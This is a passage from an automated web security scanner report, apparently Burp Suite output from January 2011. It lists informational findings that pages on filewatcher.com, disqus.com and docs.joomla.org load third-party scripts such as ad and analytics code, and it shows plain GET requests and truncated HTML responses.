</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.122. http://dir.filewatcher.com/d/OpenBSD/snapshots/alpha.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/snapshots/alpha.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/snapshots/alpha.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:59 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "iMI3o/X81m+HnFcyfNu1kA"
Content-Length: 13693
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:59 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 171
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/snapshots/alpha/</title
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.123. http://dir.filewatcher.com/d/OpenBSD/snapshots/alpha/aub-2.0.5.tgz.32465.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/snapshots/alpha/aub-2.0.5.tgz.32465.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/snapshots/alpha/aub-2.0.5.tgz.32465.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:57 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "RoWFpfcPc20SwbRr6yBiNw"
Content-Length: 23042
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 172
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.124. http://dir.filewatcher.com/d/Other.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/Other.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/Other.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:04:24 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "VG22mCije93HtWk3YQLD4A"
Content-Length: 9382
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:04:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 210
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/Other/</title>
</head>
<body cl
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.125. http://dir.filewatcher.com/d/Other/noarch.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/Other/noarch.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/Other/noarch.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:54 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "/8JaTG88mhHgyz3xG5jrGA"
Content-Length: 10078
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:54 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 230
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/Other/noarch/</title>
</head>
<
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.126. http://dir.filewatcher.com/d/Other/noarch/Applications.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/Other/noarch/Applications.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/Other/noarch/Applications.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:53 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "avK3Q2hc+r8EJDuK5JiAgw"
Content-Length: 9768
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:53 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 228
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/Other/noarch/Applications/</tit
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.127. http://dir.filewatcher.com/d/Other/noarch/Applications/Communications.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/Other/noarch/Applications/Communications.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/Other/noarch/Applications/Communications.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:52 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "fCri92R/q7ziXhrxy0LXHw"
Content-Length: 8510
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:52 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 229
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/Other/noarch/Applications/Commu
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.128. http://dir.filewatcher.com/d/Other/noarch/Applications/Communications/aub-2.0.5-10.noarch.rpm.73595.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/Other/noarch/Applications/Communications/aub-2.0.5-10.noarch.rpm.73595.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/Other/noarch/Applications/Communications/aub-2.0.5-10.noarch.rpm.73595.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:47 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "8G0RehSDBbl/jl9+yR5jLQ"
Content-Length: 21484
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:47 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 234
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - A binary file reassembler.
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.129. http://dir.filewatcher.com/d/Other/src.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/Other/src.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/Other/src.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:04:22 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "jgdk3Ry7OLtHUXgrNhHGxA"
Content-Length: 10101
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:04:22 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 211
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/Other/src/</title>
</head>
<bod
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.130. http://dir.filewatcher.com/packages-directory.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /packages-directory.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /packages-directory.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 13:53:33 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 13:53:33 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
Age: 4464
Content-Length: 25868
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>FileWatcher Software Directory</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...

21.131. http://disqus.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://disqus.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://edge.quantserve.com/quant.js

Request

GET / HTTP/1.1
Host: disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:31:31 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17203


<!DOCTYPE html>
<html>
<head>
<link rel="shortcut icon" href="http://mediacdn.disqus.com/1295633860/img/favicon.ico" type="image/vnd.microsoft.icon" />
<meta http-equiv="Content-Type" con
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.132. http://disqus.com/AnonymousUser/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://disqus.com
Path:   /AnonymousUser/

Issue detail

The response dynamically includes the following script from another domain:
  • http://edge.quantserve.com/quant.js

Request

GET /AnonymousUser/ HTTP/1.1
Host: disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:31:41 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
Content-Length: 12797
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html>
<html>
<head>
<link rel="shortcut icon" href="http://mediacdn.disqus.com/1295633860/img/favicon.ico" type="image/vnd.microsoft.icon" />
<meta http-equiv="Content-Type" con
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.133. http://disqus.com/dashboard/x22/x3Eview

Summary

Severity:   Information
Confidence:   Certain
Host:   http://disqus.com
Path:   /dashboard/x22/x3Eview

Issue detail

The response dynamically includes the following script from another domain:
  • http://edge.quantserve.com/quant.js

Request

GET /dashboard/x22/x3Eview HTTP/1.1
Host: disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NOT FOUND
Date: Mon, 24 Jan 2011 22:31:58 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
Content-Length: 10682
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html>
<html>
<head>
<link rel="shortcut icon" href="http://mediacdn.disqus.com/1295633860/img/favicon.ico" type="image/vnd.microsoft.icon" />
<meta http-equiv="Content-Type"
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.134. http://disqus.com/embed/profile/unmerged_profiles/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://disqus.com
Path:   /embed/profile/unmerged_profiles/

Issue detail

The response dynamically includes the following script from another domain:
  • http://edge.quantserve.com/quant.js

Request

GET /embed/profile/unmerged_profiles/ HTTP/1.1
Host: disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 INTERNAL SERVER ERROR
Date: Mon, 24 Jan 2011 22:31:40 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
X-Sentry-ID: 3521cbce793946fc8e25d327f310431b
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10887


<!DOCTYPE html>
<html>
<head>
<link rel="shortcut icon" href="http://mediacdn.disqus.com/1295633860/img/favicon.ico" type="image/vnd.microsoft.icon" />
<meta http-equiv="Content-Type" c
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.135. http://disqus.com/forums/7newsboston/facebook.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://disqus.com
Path:   /forums/7newsboston/facebook.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://connect.facebook.net/en_US/all.js

Request

GET /forums/7newsboston/facebook.html HTTP/1.1
Host: disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:31:50 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
Content-Length: 1246
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html>

<html>
<head>
<meta charse="utf-8">
<title></title>
<script src="http://connect.facebook.net/en_US/all.js"></script>


<script src="http://mediacdn.disqus.com/12956
...[SNIP]...

21.136. http://disqus.com/forums/integrations/twitter/tweetbox.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://disqus.com
Path:   /forums/integrations/twitter/tweetbox.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://edge.quantserve.com/quant.js

Request

GET /forums/integrations/twitter/tweetbox.html HTTP/1.1
Host: disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 INTERNAL SERVER ERROR
Date: Mon, 24 Jan 2011 22:31:49 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
X-Sentry-ID: af25630428e54dc28df4a12f364820e9
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10887


<!DOCTYPE html>
<html>
<head>
<link rel="shortcut icon" href="http://mediacdn.disqus.com/1295633860/img/favicon.ico" type="image/vnd.microsoft.icon" />
<meta http-equiv="Content-Type" c
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.137. http://disqus.com/forums/integrations/twitter/tweetbox.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://disqus.com
Path:   /forums/integrations/twitter/tweetbox.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://platform.twitter.com/anywhere.js?id=mAlbTY9QWAGj6rWXxK8xg&v=1

Request

GET /forums/integrations/twitter/tweetbox.html?f=7newsboston HTTP/1.1
Host: disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:31:48 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1002


<!DOCTYPE html>

<html>
<head>
<meta charse="utf-8">
<title></title>

<script src="http://platform.twitter.com/anywhere.js?id=mAlbTY9QWAGj6rWXxK8xg&v=1">
</script>


<script src
...[SNIP]...

21.138. http://disqus.com/profile/login/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://disqus.com
Path:   /profile/login/

Issue detail

The response dynamically includes the following script from another domain:
  • http://edge.quantserve.com/quant.js

Request

GET /profile/login/ HTTP/1.1
Host: disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:31:33 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
Content-Length: 6310
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <link rel="shortcut
...[SNIP]...
</script>
    <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.139. http://disqus.com/saml/cnn/try/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://disqus.com
Path:   /saml/cnn/try/

Issue detail

The response dynamically includes the following script from another domain:
  • http://edge.quantserve.com/quant.js

Request

GET /saml/cnn/try/ HTTP/1.1
Host: disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 INTERNAL SERVER ERROR
Date: Mon, 24 Jan 2011 22:31:46 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
X-Sentry-ID: 5942542f1b2a47d6832e30158968a5b5
Content-Length: 10887
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html>
<html>
<head>
<link rel="shortcut icon" href="http://mediacdn.disqus.com/1295633860/img/favicon.ico" type="image/vnd.microsoft.icon" />
<meta http-equiv="Content-Type" c
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.140. http://docs.joomla.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET / HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Sat, 15 Jan 2011 18:24:51 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.141. http://docs.joomla.org/Administrators

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /Administrators

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Administrators HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Sun, 16 Jan 2011 13:46:44 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30010

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.142. http://docs.joomla.org/Beginners

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /Beginners

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Beginners HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Tue, 18 Jan 2011 17:19:12 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 50386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.143. http://docs.joomla.org/Category:Cookie_jar

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /Category:Cookie_jar

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Category:Cookie_jar HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
